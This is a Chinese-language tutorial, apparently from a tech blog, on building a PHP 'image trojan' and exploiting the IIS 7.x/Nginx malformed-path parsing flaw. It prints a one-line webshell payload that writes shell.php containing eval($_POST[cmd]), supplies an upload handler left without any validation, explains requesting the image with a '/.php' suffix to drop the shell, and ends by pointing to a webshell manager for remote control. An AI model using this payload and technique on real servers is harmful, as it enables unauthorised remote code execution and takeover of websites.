网站首页 > 技术教程 正文
PHP图片木马 实现
运行环境介绍
本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php
实验过程
制作图片木马
使用windows自带的 cmd 命令行进行图片木马的制作
A.如下图所示:
准备两个文件 一个 正常的图片文件 一个 一句话木马文件
B.如下图所示:
运行上图所写的命令 会把两个文件合成一个文件 如下图所示:
会看到文件大小 会变化
然后用记事本打开两个图片就会发现 图片内容发生改变如图
至此 一句话木马图片制作完毕!
接下来我们准备测试的代码 :
如图所示 我们准备一个 上传文件的表单 代码如下:
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport"
content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<form action="./2.php" method="post" enctype="multipart/form-data">
<input type="file" name="pic" id="">
<button type="submit">上传</button>
</form>
</body>
</html>
再准备一个2.php 文件 用来处理上传图片,代码如下:
<?php
$file = $_FILES['pic'];
move_uploaded_file($file['tmp_name'],__DIR__.'/1.jpg');
开始试验
OK! 开始运行代码,上传我们生成的图片木马,上传完毕以后 如下图所示:
然后我们直接在浏览器中访问图片1.jpg 会看到图片正常显示, 接下来 我们访问图片的时候 路径 如图所示
就会发现 在当前文件夹中生成一个 shell.php内容如下 :
试验完毕
ok 剩下的就是上菜刀了!
猜你喜欢
- 2024-10-10 nginx安装部署操作(nginx安装与配置详解)
- 2024-10-10 nginx端口怎么修改(nginx端口修改为80就成Welcome)
- 2024-10-10 快速扫盲容器和服务器之间的区别和联系
- 2024-10-10 使用 PM2 部署 ASP.NET Core 程序
- 2024-10-10 apache&http(apache官网)
- 2024-10-10 LayuiCMSluyun后台模板 拿来即用(layui后端注册登录界面)
- 2024-09-14 安装 Discuz! Q的三种方法(discuz安装使用教程)
- 2024-09-14 centos7稳定nginx搭建,快速搭建nginx
- 2024-09-14 Nginx教程:概念+安装+SSL安装,通过调优Nginx来提高应用性能
- 2024-09-14 Nginx的10个使用场景 # 强化学习(nginx常用功能)
你 发表评论:
欢迎- 最近发表
-
- Linux新手必看:几种方法帮你查看CPU核心数量
- linux基础命令之lscpu命令(linux中ls命令的用法)
- Linux lscpu 命令使用详解(linux常用ls命令)
- 如何查询 Linux 中 CPU 的数量?这几个命令要知道!
- 在linux上怎么查看cpu信息(linux如何查看cpu信息)
- 查看 CPU 的命令和磁盘 IO 的命令
- 如何在CentOS7上改变网卡名(centos怎么改网卡名字)
- 网工必备Linux网络管理命令(网工必备linux网络管理命令是什么)
- Linux 网络命令知多少(linux 网络 命令)
- Linux通过命令行连接wifi的方式(linux命令行连接无线网)
- 标签列表
-
- 下划线是什么 (87)
- 精美网站 (58)
- qq登录界面 (90)
- nginx 命令 (82)
- nginx .http (73)
- nginx lua (70)
- nginx 重定向 (68)
- Nginx超时 (65)
- nginx 监控 (57)
- odbc (59)
- rar密码破解工具 (62)
- annotation (71)
- 红黑树 (57)
- 智力题 (62)
- php空间申请 (61)
- 按键精灵 注册码 (69)
- 软件测试报告 (59)
- ntcreatefile (64)
- 闪动文字 (56)
- guid (66)
- abap (63)
- mpeg 2 (65)
- column (63)
- dreamweaver教程 (57)
- excel行列转换 (56)
本文暂时没有评论,来添加一个吧(●'◡'●)